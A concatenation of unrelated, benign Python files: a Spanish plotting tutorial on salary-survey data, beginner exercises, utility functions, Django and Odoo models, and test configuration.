ax.yaxis.set_major_locator(MultipleLocator(1.000))
ax.yaxis.set_minor_locator(AutoMinorLocator(4))
ax.xaxis.set_minor_formatter(FuncFormatter(minor_tick))
ax.set_xlim(0, 4)
ax.set_ylim(0, 4)
ax.tick_params(which='major', width=1.0)
ax.tick_params(which='major', length=10)
ax.tick_params(which='minor', width=1.0, labelsize=10)
ax.tick_params(which='minor', length=5, labelsize=10, labelcolor='0.25')
ax.grid(linestyle="--", linewidth=0.5, color='.25', zorder=-10)
ax.plot(X, Y1, c=(0.25, 0.25, 1.00), lw=2, label="Blue signal", zorder=10)
ax.plot(X, Y2, c=(1.00, 0.25, 0.25), lw=2, label="Red signal")
ax.plot(X, Y3, linewidth=0, marker='o', markerfacecolor='w', markeredgecolor='k')
ax.set_title("Anatomy of a figure", fontsize=20, verticalalignment='bottom')
ax.set_xlabel("X axis label")
ax.set_ylabel("Y axis label")
ax.legend()
def circle(x, y, radius=0.15):
from matplotlib.patches import Circle
from matplotlib.patheffects import withStroke
circle = Circle(
(x, y),
radius,
clip_on=False,
zorder=10,
linewidth=1,
edgecolor='black',
facecolor=(0, 0, 0, 0.0125),
path_effects=[withStroke(linewidth=5, foreground='w')],
)
ax.add_artist(circle)
def text(x, y, text):
ax.text(
x,
y,
text,
backgroundcolor="white",
ha='center',
va='top',
weight='bold',
color='blue',
)
# Minor tick
circle(0.50, -0.10)
text(0.50, -0.32, "Minor tick label")
# Major tick
circle(-0.03, 4.00)
text(0.03, 3.80, "Major tick")
# Minor tick
circle(0.00, 3.50)
text(0.00, 3.30, "Minor tick")
# Major tick label
circle(-0.15, 3.00)
text(-0.15, 2.80, "Major tick label")
# X Label
circle(1.80, -0.27)
text(1.80, -0.45, "X axis label")
# Y Label
circle(-0.27, 1.80)
text(-0.27, 1.6, "Y axis label")
# Title
circle(1.60, 4.13)
text(1.60, 3.93, "Title")
# Blue plot
circle(1.75, 2.80)
text(1.75, 2.60, "Line\n(line plot)")
# Red plot
circle(1.20, 0.60)
text(1.20, 0.40, "Line\n(line plot)")
# Scatter plot
circle(3.20, 1.75)
text(3.20, 1.55, "Markers\n(scatter plot)")
# Grid
circle(3.00, 3.00)
text(3.00, 2.80, "Grid")
# Legend
circle(3.70, 3.80)
text(3.70, 3.60, "Legend")
# Axes
circle(0.5, 0.5)
text(0.5, 0.3, "Axes")
# Figure
circle(-0.3, 0.65)
text(-0.3, 0.45, "Figure")
color = 'blue'
ax.annotate(
'Spines',
xy=(4.0, 0.35),
xytext=(3.3, 0.5),
weight='bold',
color=color,
arrowprops=dict(arrowstyle='->', connectionstyle="arc3", color=color),
)
ax.annotate(
'',
xy=(3.15, 0.0),
xytext=(3.45, 0.45),
weight='bold',
color=color,
arrowprops=dict(arrowstyle='->', connectionstyle="arc3", color=color),
)
ax.text(
4.0, -0.4, "Made with http://matplotlib.org", fontsize=10, ha="right", color='.5'
)
plt.show()
# -
# ### Figuras
# En lo que nos es relevante ahora, una [figura](https://matplotlib.org/faq/usage_faq.html#figure) es un contenedor de plots. Las figuras tienen un identificador único. Podemos obtener la figura activa con `plt.gcf()` (`g`et `c`urrent `f`igure) o crear una nueva con `plt.figure()`.
#
# Algunos parámetros que nos importan:
# ```
# figsize(float, float), default: rcParams["figure.figsize"] (default: [6.4, 4.8])
# Width, height in inches.
#
# dpifloat, default: rcParams["figure.dpi"] (default: 100.0)
# The resolution of the figure in dots-per-inch.
# ```
# ### Axis
# Un [axis](https://matplotlib.org/faq/usage_faq.html#axes) es un plot per se, digamos.
# ### Axis labels
# Son las descripciones en el eje x e y.
# ### Title
# Es el título de la figura (no del plot).
# ### Legend
# Son descripciones de colecciones de datos.
# ## Escalando los plots
#
# Tenemos dos parámetros para ello. Hacen cosas distintas.
#
# Por un lado `figsize` cambia el tamaño en pulgadas de la figura. `dpi` cambia la cantidad de pixels que hay en una pulgada.
#
# Entonces dada una figura con figsize $(w,h)$ y dpi $d$: $$p_x = d*w\\p_y = d*h $$
#
# Por defecto `dpi` vale `100` y `figsize` vale `[6.4, 4.8]`, de modo que obtendremos plots de `640 x 480`.
#
# Podemos cambiar los valores por defecto de `matplotlib` a través del diciconario `rcParams`:
#
# ```python
# matplotlib.rcParams['figure.dpi'] = 150
# ```
#
# Veamos ahora algunos ejemplos.
plt.figure()
df['¿Contribuís a proyectos open source?'].value_counts().plot(
kind='pie', autopct='%1.0f%%'
)
plt.show()
plt.figure(figsize=(6.4 * 1.5, 4.8 * 1.5), dpi=100)
df['¿Contribuís a proyectos open source?'].value_counts().sort_index().plot(
kind='pie', autopct='%1.0f%%'
)
plt.show()
# Las fuentes estan en terminos relativos al dpi
plt.figure(figsize=(6.4, 4.8), dpi=150)
df['¿Contribuís a proyectos open source?'].value_counts().sort_index().plot(
kind='pie', autopct='%1.0f%%'
)
plt.show()
# Recomendamos cambiar el tamaño con DPI si lo que se quiere es ver la visualizacion "mas grande", si lo que se quiere es cambiar la forma se puede usar el figsize
# ## Plots con pyplot
#
# Vamos a repetir un poco los plots anteriores pero revisando la api de pyplot y cambiando algunas cosas.
# ### Bar plot
plt.figure(dpi=(125))
users_per_os = (
df['¿Qué SO usás en tu laptop/PC para trabajar?']
.value_counts()
.sort_values(ascending=False)
)
plt.bar(users_per_os.index, users_per_os.values)
plt.ylabel("Usuarios")
plt.xlabel("Sistema operativo")
plt.title('¿Qué SO usás en tu laptop/PC para trabajar?')
plt.show()
# Algo que podemos ver es que `*BSD` es un valor prácticamente invisible. ¿Mejora si se pone en escala y-logaritmica?
plt.figure(dpi=(125))
users_per_os = (
df['¿Qué SO usás en tu laptop/PC para trabajar?']
.value_counts()
.sort_values(ascending=False)
)
plt.bar(users_per_os.index, users_per_os.values)
plt.yscale("log")
plt.ylabel("Usuarios")
plt.xlabel("Sistema operativo")
plt.title('¿Qué SO usás en tu laptop/PC para trabajar?')
plt.show()
# No mucho, pero al menos se ve que está en el orden de $10^0$
#
# Y que es ese `plt.show()` que estamos poniendo ahora? Básicamente muestra todas las figuras abiertas. En un notebook no hay mucha necesidad de usarlo, pero veremos el `__repr__` del último elemento de la celda si no lo hemos asignado a una variable (o si no le hemos puesto un `;` al final).
# ### Scatter plot
#
# Revisemos un scatter plot, pero con la api de pyplot.
plt.figure(dpi=(150))
plt.scatter(
x=df['Salario mensual NETO (en tu moneda local)'],
y=df['Salario mensual BRUTO (en tu moneda local)'],
s=5,
)
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# ¿Sería interesante ver que tan conforme está la gente con sus salarios no? Podemos introducir esa columna como color del scatter plot.
# +
plt.figure(dpi=(125))
plt.scatter(
x=df['Salario mensual NETO (en tu moneda local)'],
y=df['Salario mensual BRUTO (en tu moneda local)'],
s=5,
c=df['¿Qué tan conforme estás con tu sueldo?'],
)
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# No tenemos ni idea de que es cada color. Pongamos un [legend](https://matplotlib.org/api/_as_gen/matplotlib.pyplot.legend.html#matplotlib.pyplot.legend)!
# +
fig, ax = plt.subplots(dpi=150)
for conformity in np.sort(df['¿Qué tan conforme estás con tu sueldo?'].unique()):
conformity_df = df[df['¿Qué tan conforme estás con tu sueldo?'] == conformity]
ax.scatter(
x=conformity_df['Salario mensual NETO (en tu moneda local)'],
y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
s=5,
label=conformity,
alpha=0.65,
)
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Pero hay outliers que nos complican... veamos los que están entre 10mil y 500mil
# +
fig, ax = plt.subplots(dpi=150)
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
& (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
for conformity in np.sort(df_submm['¿Qué tan conforme estás con tu sueldo?'].unique()):
conformity_df = df_submm[
df_submm['¿Qué tan conforme estás con tu sueldo?'] == conformity
]
ax.scatter(
x=conformity_df['Salario mensual NETO (en tu moneda local)'],
y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
s=2,
label=conformity,
alpha=0.65,
)
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Como la conformidad 4 fue la ultima en ser ploteada ofusca el plot, además los colores no parecen adecuados, ya solucionaremos esto
# ### Histograma
#
# Quizás notaron ese llamado a `plt.subplots`. Vamos a ver un poco de qué se trata mientras vemos como hacer histogramas.
#
# Tanto el salario neto como el salario bruto tienen soportes continuos, y demasiados valores diferentes. ¿Estaría bueno ver un histograma de cada uno no? Sería incluso mejor tenerlos lado a lado.
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 1e6)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
fig, axes = plt.subplots(nrows=1, ncols=2, sharey=True, dpi=150, figsize=(6.4 * 2, 4.8))
axes[0].hist(df_submm['Salario mensual BRUTO (en tu moneda local)'], bins=25)
axes[0].set_title("Salario bruto")
axes[0].set_xlabel("Salario")
axes[0].set_ylabel("Cantidad")
axes[1].hist(df_submm['Salario mensual NETO (en tu moneda local)'], bins=25)
axes[1].set_title("Salario neto")
axes[1].set_xlabel("Salario")
axes[1].set_ylabel("Cantidad")
plt.show()
# -
# Sabiendo que podemos superponerlos, podriamos superponer los histogramas
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 1e6)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
plt.figure(dpi=150)
plt.hist(
df_submm['Salario mensual BRUTO (en tu moneda local)'],
bins=25,
label="Salario bruto",
alpha=0.5,
)
plt.hist(
df_submm['Salario mensual NETO (en tu moneda local)'],
bins=25,
label="Salario neto",
alpha=0.5,
)
plt.title("Distribución del salario neto y bruto")
plt.xlabel("Salario")
plt.ylabel("Cantidad")
plt.legend()
plt.show()
# -
# Para comparar distribuciones continuas podriamos usar tambien boxplots y violinplots.
#
# Podemos aprovechar la superposicion de plots para señalar cosas que creamos importantes.
# +
plt.figure(dpi=150)
plt.hist(df['¿De qué % fue el ajuste total?'], bins=30, label="Ajuste %")
plt.title("Distribución del ajuste porcentual\npor inflación para 2020")
plt.ylabel("Frecuencia")
plt.xlabel("% del ajuste de inflación de 2020")
plt.axvline(x=13.6, color="darkred", label="Inflación 1er semestre INDEC")
plt.legend()
plt.show()
# -
# # Seaborn
import seaborn as sns
sns.set()
# [Seaborn](http://seaborn.pydata.org) tambien usa matplotlib al igual que pandas, por lo que todas las funciones de matplotlib tambien le sirven
# ## Distribution plots
# ### Countplot
#
# El countplot es la forma que tiene seaborn de hacer gráficos de barras, permitiendo dividirlo de distintas formas.
plt.figure(dpi=150)
sns.countplot(x="Trabajo de", data=df)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.show()
# Podemos usar el parametro order para indicar el orden en el que lo queremos pero tambien cuales profesiones queremos
plt.figure(dpi=150)
sns.countplot(
x="Trabajo de", data=df, order=df["Trabajo de"].value_counts().iloc[:20].index
)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# ### Density plot
# Podemos ver la distribución del salario como habíamos visto con el histograma
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 1e6)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 1e6)
]
plt.figure(dpi=150)
sns.kdeplot(
df_submm['Salario mensual NETO (en tu moneda local)'], label="Salario mensual neto"
)
plt.title("Distribución del salario neto")
plt.xlabel("Salario")
plt.yticks([], [])
plt.show()
# -
# ### Violinplot
df['Tiene gente a cargo'] = df['¿Gente a cargo?'] > 0
plt.figure(dpi=150)
plt.title("Salario NETO según si tiene gente a cargo\nen Argentina")
sns.violinplot(
data=df[
(df["Estoy trabajando en"] == "Argentina")
& (df['Salario mensual NETO (en tu moneda local)'] < 500000)
],
y='Salario mensual NETO (en tu moneda local)',
x='Tiene gente a cargo',
palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
plt.show()
df['Tiene gente a cargo'] = df['¿Gente a cargo?'] > 0
plt.figure(dpi=150)
plt.title("Distribución del salario NETO según\nsi tiene gente a cargo en Argentina")
sns.violinplot(
data=df[
(df["Estoy trabajando en"] == "Argentina")
& (df['Salario mensual NETO (en tu moneda local)'] < 500000)
],
y='Salario mensual NETO (en tu moneda local)',
x='Tiene gente a cargo',
palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
plt.xticks([False, True], ["No", "Sí"])
plt.show()
# ### Boxplot
plt.figure(dpi=150)
plt.title("Distribución del salario NETO según\nsi tiene gente a cargo en Argentina")
sns.boxplot(
data=df[
(df["Estoy trabajando en"] == "Argentina")
& (df['Salario mensual NETO (en tu moneda local)'] < 500000)
],
y='Salario mensual NETO (en tu moneda local)',
x='Tiene gente a cargo',
palette=['#D17049', "#89D15E"],
)
plt.ylabel("Salario NETO")
plt.xticks([False, True], ["No", "Sí"])
plt.show()
# ## Comparison plots
# ### Scatter plot
# Recordemos el último scatter que hicimos
# +
fig, ax = plt.subplots(dpi=150)
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
& (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
for conformity in np.sort(df_submm['¿Qué tan conforme estás con tu sueldo?'].unique()):
conformity_df = df_submm[
df_submm['¿Qué tan conforme estás con tu sueldo?'] == conformity
]
ax.scatter(
x=conformity_df['Salario mensual NETO (en tu moneda local)'],
y=conformity_df['Salario mensual BRUTO (en tu moneda local)'],
s=2,
label=conformity,
alpha=0.65,
)
ax.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Al haber ploteado en orden los distintos puntos se superponen de forma que no nos permite ver diferencias. Con el hue de seaborn podemos hacer que la superposición sea random.
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
& (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=150)
sns.scatterplot(
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
data=df_submm,
alpha=0.7,
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Ahora se puede aprecias el gradiente de colores a medida el salario aumenta
# ### Heatmap
cooccurrence = pd.pivot_table(
df,
'¿Gente a cargo?',
'Cómo creés que está tu sueldo con respecto al último semestre',
'¿Qué tan conforme estás con tu sueldo?',
'count',
).sort_index()
cooccurrence
plt.figure(dpi=150)
plt.ylabel("Cómo creés que está tu sueldo con respecto al último semestre", fontsize=9)
sns.heatmap(cooccurrence.reindex([4, 3, 2, 1]), square=True, cmap="Wistia")
plt.show()
# ## Regression plots
# ### Regplot
plt.figure(dpi=150)
sns.regplot(
data=df,
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
)
plt.show()
# ## Relational plots
# ### Lineplot
plt.figure(dpi=150)
sns.lineplot(
data=df, x='Años de experiencia', y='Salario mensual BRUTO (en tu moneda local)'
)
plt.show()
# # Paletas de colores
#
# La elección de colores no es una decisión menor. Permite el mapeo de números a una representación visual y distinción entre grupos distintos. Hay mucha literatura sobre los criterios que debe cumplir una paleta de colores, algunos criterios relevantes son:
# - que no sean sensitivas a deficiencias visuales
# - el ordenamiento de los colores debe ser el mismo para todas las personas intuitivamente
# - la interpolación percibida debe corresponderse con el mapa escalar subyacente
# ## Taxonomía de paletas
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
# ### Cualitativas
# Se usan para representar colecciones de clases discretas sin orden. Los colores no tienen un ordenamiento, por lo tanto no s on apropiados para mapearse a un valor escalar.
sns.palplot(sns.color_palette('pastel'))
plt.show()
sns.palplot(sns.color_palette('colorblind'))
plt.show()
sns.palplot(sns.color_palette('muted'))
plt.show()
# ### Secuenciales
# Son casi monocromaticas, van de un color altamente saturado hacia distintos niveles de saturación más baja. Se suele aumentar la luminancia a medida que decrece la saturación, de modo que la paleta termina en colores cercanos al blanco. Se usa para representar información que tiene un ordenamiento.
sns.palplot(sns.color_palette('Blues'))
plt.show()
sns.palplot(sns.color_palette('Blues_r'))
plt.show()
sns.palplot(sns.color_palette('Blues_d'))
plt.show()
# #### Cubehelix
# Es un sistema de paletas de colores que tienen un crecimiento/decrecimiento lineal en brillo y alguna variacion de tono. Lo cual implica que **se preserva la información al convertirse a blanco y negro**. Es ideal para **imprimir**.
sns.palplot(sns.color_palette("cubehelix", 12))
plt.show()
# ### Divergentes
# Tienen dos componentes principales de color, transicionando entre ambos pasando por un color poco saturado (blanco, amarillo). Se suelen usar para representar vvalores esacalares con un valor significativo cerca de la mediana.
#
# Es importante tratar de no usar rojo y verde.
sns.palplot(sns.color_palette('coolwarm', 7))
plt.show()
sns.palplot(sns.color_palette('RdBu_r', 7))
plt.show()
sns.palplot(sns.color_palette('BrBG', 7))
plt.show()
# ### Cíclicas
# Tienen dos componentes principales de color, que se encuentran en el medio y extremos en un color poco saturado. Se usan para valores que ciclan.
# +
sns.palplot(sns.color_palette("hls", 12))
plt.show()
# brillo percibido mas uniformemente
sns.palplot(sns.color_palette("husl", 12))
plt.show()
# -
# ## Algunos casos prácticos
# Podemos indicar que color queremos con una tupla RGB donde cada elemento de la tupla es un número de 0 a 1 que indica la intensidad de alguno de los 3 colores primarios de la luz (__Rojo__, __Verde__, __Azul__) o lo que es lo mismo su codigo **hexadecimal**
# +
from __future__ import print_function
from ipywidgets import interact, interactive, fixed, interact_manual
import ipywidgets as widgets
def rgb_to_hex(rgb):
return '%02x%02x%02x' % rgb
def plot_color(r, g, b):
print(
"Hexadecimal: %s" % rgb_to_hex((round(r * 255), round(g * 255), round(b * 255)))
)
sns.palplot([(r, 0, 0), (0, g, 0), (0, 0, b), (r, g, b)])
plt.xticks([0, 1, 2, 3], ["Rojo", "Azul", "Verde", "(r,g,b)"])
plt.grid(False)
plt.show()
# -
interact(
plot_color, r=(0.0, 1.0, 1 / 255), g=(0.0, 1.0, 1 / 255), b=(0.0, 1.0, 1 / 255)
)
# Pueden jugar con más en: https://color.adobe.com/
# Recordando el pie plot podriamos elegir colores más adecuados en donde comunicamos tener gente a cargo como algo más "positivo"
plt.figure(dpi=150)
df['¿Contribuís a proyectos open source?'].value_counts()[
["Sí", "No"]
].sort_index().plot(kind='pie', autopct='%1.0f%%', colors=['#AEB8AF', "#4AD172"])
plt.title('¿Contribuís a proyectos open source?')
plt.ylabel("")
plt.show()
# Recordemos el countplot que hicimos
plt.figure(dpi=125)
sns.countplot(
x="Trabajo de", data=df, order=df["Trabajo de"].value_counts().iloc[:20].index
)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# Podemos pensar el color como una dimensión más, que sentido tienen en esta visualización los colores? Está scrum master relacionado con developer por tener colores parecidos?
plt.figure(dpi=125)
sns.countplot(
x="Trabajo de",
data=df,
order=df["Trabajo de"].value_counts().iloc[:20].index,
color=(0.23, 0.72, 0.41),
)
plt.ylabel("Cantidad")
plt.xlabel("Profesión")
plt.title("Cantidad de encuestados según profesión")
plt.xticks(rotation=90)
plt.show()
# Teníamos el siguiente scatter plot
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
& (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=125)
sns.scatterplot(
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
data=df_submm,
alpha=0.7,
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# Podemos cambiar los colores para dar a entender que una conformidad de 1 es "mala" y una conformidad de 4 es "buena"
sns.color_palette("RdYlGn_r", 4)
sns.palplot(sns.color_palette("RdYlGn_r", 4))
sns.palplot(list(reversed(sns.color_palette("RdYlGn_r", 4))))
# +
df_submm = df[
(df['Salario mensual NETO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 5e5)
& (df['Salario mensual BRUTO (en tu moneda local)'] > 1e4)
& (df['Salario mensual NETO (en tu moneda local)'] > 1e4)
]
plt.figure(dpi=125)
sns.scatterplot(
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
hue=df_submm['¿Qué tan conforme estás con tu sueldo?'].tolist(),
data=df_submm,
alpha=0.7,
palette=list(reversed(sns.color_palette("RdYlGn_r", 4))),
)
plt.legend(title="Conformidad con el salario")
plt.ylabel("Salario bruto")
plt.xlabel("Salario neto")
plt.title('Relación entre salario neto y salario bruto')
plt.show()
# -
# ## Referencias
#
# - [Documentación de seaborn](http://seaborn.pydata.org/tutorial/color_palettes.html)
# - [Diverging Color Maps for Scientific Visualization - Kenneth Moreland](https://cfwebprod.sandia.gov/cfdocs/CompResearch/docs/ColorMapsExpanded.pdf)
# - [XKCD color survey](https://blog.xkcd.com/2010/05/03/color-survey-results/)
# - [Subtleties of colors series](https://earthobservatory.nasa.gov/blogs/elegantfigures/2013/08/05/subtleties-of-color-part-1-of-6/)
# - [Documentación de matplotlib](https://matplotlib.org/tutorials/colors/colormaps.html)
# # Pandas profiling
# +
from pandas_profiling import ProfileReport
report = ProfileReport(
df, title='Encuesta de sueldos sysarmy 2020.02', explorative=True, lazy=False
)
# -
report.to_notebook_iframe()
|
name = 'Brandon M. Taylor'
age = 34
height = 69 # inches
height_cm = height * 2.54
weight = 220 # totally a lie
weight_kg = 220 * 0.45359237
eyes = 'Green'
teeth = 'White'
hair = "Brownish Red"
print(f"Let's talk about {name}.")
print(f"He's {height} inches tall.")
print(f"He's {height_cm} centimeters tall.")
print(f"He's {weight} pounds heavy.")
print(f"He's {weight_kg} kilograms heavy.")
print("Actually that's not too heavy.")
print(f"He's got {eyes} eyes and {hair} hair.")
print(f"His teeth are usually {teeth} depending on the candy.")
# this line is tricky, try to get it exactly right
total = age + height + weight
print(f"If I add {age}, {weight}, and {height} I get {total}.") |
from base64 import b64encode, b64decode
from gzip import compress, decompress
from json import dumps, loads
from uuid import uuid4, UUID
def is_valid_uuid(uuid_to_test: str, version: int = 4) -> bool:
try:
uuid_obj = UUID(uuid_to_test, version=version)
except ValueError:
return False
return str(uuid_obj) == uuid_to_test
def encode_to_bytes(data: object, str_encoding: str = 'utf-8') -> bytes:
try:
data_str = dumps(data)
data_bytes = bytes(data_str, str_encoding)
compressed = compress(data_bytes)
encoded = b64encode(compressed)
return encoded
except Exception as error:
raise Exception('failed to compress data: {}'.format(error.args))
def decode_from_bytes(data: bytes, str_encoding: str = 'utf-8') -> object:
try:
decoded = b64decode(data)
decompressed = decompress(decoded)
data_str = decompressed.decode(str_encoding)
return loads(data_str)
except Exception as error:
raise Exception('failed to decompress data: {}'.format(error.args))
|
import logging
# Configurations
from .configuration_bert import BERT_PRETRAINED_CONFIG_ARCHIVE_MAP, BertConfig
from .configuration_utils import PretrainedConfig
# Files and general utilities
from .file_utils import (
CONFIG_NAME,
MODEL_CARD_NAME,
PYTORCH_PRETRAINED_BERT_CACHE,
PYTORCH_TRANSFORMERS_CACHE,
TF2_WEIGHTS_NAME,
TF_WEIGHTS_NAME,
TRANSFORMERS_CACHE,
WEIGHTS_NAME,
add_end_docstrings,
add_start_docstrings,
cached_path,
is_tf_available,
is_torch_available,
is_torch_tpu_available,
)
# Tokenizers
from .tokenization_bert import BasicTokenizer, BertTokenizer, BertTokenizerFast, WordpieceTokenizer
from .tokenization_utils import PreTrainedTokenizer
from .tokenization_utils_base import (
BatchEncoding,
CharSpan,
PreTrainedTokenizerBase,
SpecialTokensMixin,
TensorType,
TokenSpan,
)
from .tokenization_utils_fast import PreTrainedTokenizerFast
# Modeling
if is_torch_available():
from .modeling_utils import PreTrainedModel, prune_layer, Conv1D, top_k_top_p_filtering, apply_chunking_to_forward
from .modeling_bert import (
BertPreTrainedModel,
BertModel,
BertForPreTraining,
BertForMaskedLM,
BertLMHeadModel,
BertForNextSentencePrediction,
BertForSequenceClassification,
BertForMultipleChoice,
BertForTokenClassification,
BertForQuestionAnswering,
load_tf_weights_in_bert,
BERT_PRETRAINED_MODEL_ARCHIVE_LIST,
BertLayer,
)
logger = logging.getLogger(__name__)
if not is_tf_available() and not is_torch_available():
logger.warning(
"Neither PyTorch nor TensorFlow >= 2.0 have been found."
"Models won't be available and only tokenizers, configuration"
"and file/data utilities can be used."
)
|
#! /usr/bin/python2.7
# -*- coding: utf-8 -*-
from math import sqrt
from sys import float_info as fi
def heron(a, b, c):
"""Oblicza pole trojkata za pomoca wzoru Herona."""
if a < fi.epsilon or b < fi.epsilon or c < fi.epsilon:
raise ValueError
if a + b < c or a + c < b or b + c < a:
raise ValueError
return sqrt((a + b + c) * (a + b - c) * (a - b + c) * (-a + b + c)) / 4
print "Area of triangle a=4,b=5,c=6: " + str(heron(4, 5, 6))
|
from django.db import models
class kvmtag(models.Model):
hostname = models.CharField(max_length=20)
ip = models.IPAddressField(max_length=50)
ip1 = models.IPAddressField(max_length=50)
ip2 = models.IPAddressField(max_length=50)
location = models.CharField(max_length=50)
osversion = models.CharField(max_length=20)
memory = models.CharField(max_length=20)
disk = models.CharField(max_length=20)
model_name = models.CharField(max_length=50)
cpu_core = models.CharField(max_length=20)
sorts = models.CharField(max_length=20)
salt_status = models.CharField(max_length=20)
create_time = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.hostname
class kvm_list(models.Model):
cloud_name = models.CharField(max_length=40)
hostname = models.CharField(max_length=20)
ip = models.IPAddressField(max_length=50)
vir_disk = models.CharField(max_length=20)
main_host = models.CharField(max_length=20)
location = models.CharField(max_length=50)
mac = models.CharField(max_length=50)
kvm_location = models.CharField(max_length=40)
create_time = models.DateTimeField(auto_now_add=True)
host_status = models.CharField(max_length=10,default='Unkown')
projects_name = models.CharField(max_length=50)
mirror_name = models.CharField(max_length=50)
secret_name = models.CharField(max_length=50)
def __unicode__(self):
return self.cloud_name
class Meta:
ordering = ['-create_time']
class mirrorname(models.Model):
mirror_name = models.CharField(max_length=50)
level = models.IntegerField(max_length=2)
parent = models.IntegerField(max_length=2)
def __unicode__(self):
return self.mirror_name
class Meta:
db_table = 'mirrorname'
class secret_key(models.Model):
secretkey_name = models.CharField(max_length=20)
create_person = models.CharField(max_length=20)
create_time = models.DateTimeField(auto_now_add=True)
projects_name = models.CharField(max_length=30)
def __unicode__(self):
return self.secretkey_name
class Meta:
db_table = 'secretkey'
class zcloud_size(models.Model):
size = models.CharField(max_length=20)
create_time = models.DateField(auto_now_add=True)
def __unicode__(self):
return self.size
class Meta:
db_table = 'zcloud_size'
class mirror_size(models.Model):
name = models.CharField(max_length=30)
size = models.CharField(max_length=20)
create_time = models.DateField(auto_now_add=True)
def __unicode__(self):
return u'%s %s %s'.format(self.name,self.size,self.create_time)
class Meta:
db_table = 'mirror_size'
|
# -*- coding: utf-8 -*-
#################################################################################
#
# Odoo, Open Source Management Solution
# Copyright (C) 2018-today Ascetic Business Solution <www.asceticbs.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#################################################################################
from odoo import api, fields, models, _
## inherit class 'hr.employee' to get details of employee and set rank according to assigned Tasks to salesperson
class Employee(models.Model):
_inherit = "hr.employee"
number_task_rank = fields.Integer(string="Rank", compute='task_rank')
def task_rank(self):
employee_rank_list = []
for employee in self:
if employee.user_id:
tasks_list = []
task_ids = self.env['project.task'].search([('user_id','=',employee.user_id.id)])
for task in task_ids:
if task.stage_id.name == 'Done':
tasks_list.append(task)
employee_dict = { 'employee' : employee , 'length' : len(tasks_list)}
employee_rank_list.append(employee_dict)
## sorted dictionary to get rank of employee
newlist = sorted(employee_rank_list, key=lambda k: k['length'], reverse=True)
rank = 0
for line in newlist:
if line:
rank = rank + 1
line['employee'].update({'number_task_rank' : rank})
|
import pytest
pytest_plugins = "pytester"
# See https://github.com/spulec/moto/issues/3292#issuecomment-770682026
@pytest.fixture(autouse=True)
def set_aws_region(monkeypatch):
monkeypatch.setenv("AWS_DEFAULT_REGION", "us-east-1")
|
#!/usr/bin/env python3
# vim:tabstop=4:softtabstop=4:shiftwidth=4
import sys
from argparse import ArgumentParser
from argparse import FileType
